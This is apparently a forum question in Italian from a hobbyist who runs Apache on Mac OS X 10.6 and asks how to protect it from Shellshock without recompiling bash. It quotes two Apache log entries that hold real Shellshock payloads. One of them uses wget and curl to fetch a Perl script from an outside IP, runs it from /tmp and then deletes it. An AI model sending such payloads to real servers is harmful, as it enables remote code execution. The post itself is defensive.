Gestisco un piccolo server HTTP (Apache) dal mio Mac principalmente come hobby. Se viene compromesso, non è la fine del mondo, ma è qualcosa che mi piacerebbe sicuramente prevenire. Ho impostato un processo launchctl per controllare il file di log di Apache per eventuali richieste relative a Shellshock e ieri sera ho ricevuto due voci correlate:
82.221.128.246 - - [29/Sep/2014:08:14:41 -0400] "GET / HTTP/1.1" 200 2081 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
173.45.100.18 - - [29/Sep/2014:00:52:07 -0400] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
Il primo sembra innocuo e l'IP ospita un sito Web molto legittimo che afferma che le loro richieste sono solo a scopo di ricerca. La seconda è una storia diversa, però, prova a scaricare ed eseguire uno script Perl. Fortunatamente non ho installato wget, quindi questo attacco non ha funzionato, ma sembra che sia solo questione di tempo prima che ottenga una richiesta come questa che causa qualche danno.
Apple ha appena rilasciato le patch per OS X 10.7 e quest'ultimo, ma sfortunatamente sto eseguendo 10.6. Quali misure semplici e affidabili posso prendere (cioè non ricompilazione bash ) per ridurre i miei rischi?